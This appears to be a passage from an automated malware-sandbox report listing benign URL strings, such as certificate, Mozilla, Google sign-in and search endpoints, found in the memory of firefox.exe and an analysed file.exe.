Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3163242946.0000016DE0769000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000021.00000003.2897684788.0000016DDE127000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000021.00000003.2897684788.0000016DDE127000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000021.00000003.3218619086.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3199884339.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/r1.crt0
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/wr2.crt0
Source: firefox.exe, 00000021.00000003.3129026786.0000016DEA271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6692000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2972558086.0000016DDCEE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9AE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3027607728.0000016DDCEC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2971937157.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2885924546.0000016DDF1D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2974335700.0000016DDCE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2835528969.0000016DDCED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3188019102.0000016DE9DCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2981497838.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3035113708.0000016DDA6FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2971937157.0000016DDCE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2885924546.0000016DDF13D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3184567289.0000016DDC9A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2913893006.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2967575994.0000016DE0495000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3222691378.0000016DDC9A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://o.pki.goog/wr20%
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA3BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0(
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0d
Source: firefox.exe, 00000021.00000003.3211240177.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA3BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161712087.0000016DE4BCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE67AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000021.00000003.3203517342.0000016DEA3FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE662C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161712087.0000016DE4BCC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: file.exe, file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000021.00000003.2883300923.0000016DDF269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2880752425.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2863559755.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF242000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2887374046.0000016DDF065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000021.00000003.2883300923.0000016DDF269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467696614.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://149349728.v2.pressablecdn.com/wp-content/uploads/2024/06/nikita-shirokov-0C0scqtrthY-unsplas
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE975F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://accounts.google.com
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/1
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_s
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/favicon.ico
Source: firefox.exe, 00000021.00000003.3210615866.0000016DEA8F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202170893.0000016DECCE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3218814454.0000016DECCEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport
Source: firefox.exe, 00000021.00000003.3202170893.0000016DECCE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3218814454.0000016DECCEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport)
Source: firefox.exe, 00000021.00000003.3202373857.0000016DECCDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210911621.0000016DEA8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport/allowlist
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport;
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3223621375.0000016DEE3D3000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr, WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fa
Source: firefox.exe, 00000021.00000003.2866313930.0000016DDE1FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: firefox.exe, 00000021.00000003.3158429296.0000016DE9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE978E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=1.0.0&encp=HF3vIpkY7RcdjpkX4Z8Yfplmfp8kfZ8m7ncqjna
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=1.0.0&encp=HF3vIpkX7RcdjpkX4Z8Yfplmfp8kfZ8m7ncqjnaz7nIZgGeY
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000021.00000003.3199884339.0000016DEE272000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202097868.0000016DEE20F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161465579.0000016DE4BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE6790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3204782382.0000016DE9E4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/boq-infra/identity-boq-js-css-signers
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/AccountsSignInUi
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/boq-infra/identity-boq-js-css-signers
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube_main
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d1n0c1ufntxbvh.cloudfront.net/photo/eabcdc61/98254/1200x/
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/HTTP/Headers/Set-Cookie/SameSite
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE66BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://download.mozilla.org/?product=firefox-127.0-complete&os=win64&lang=en-US
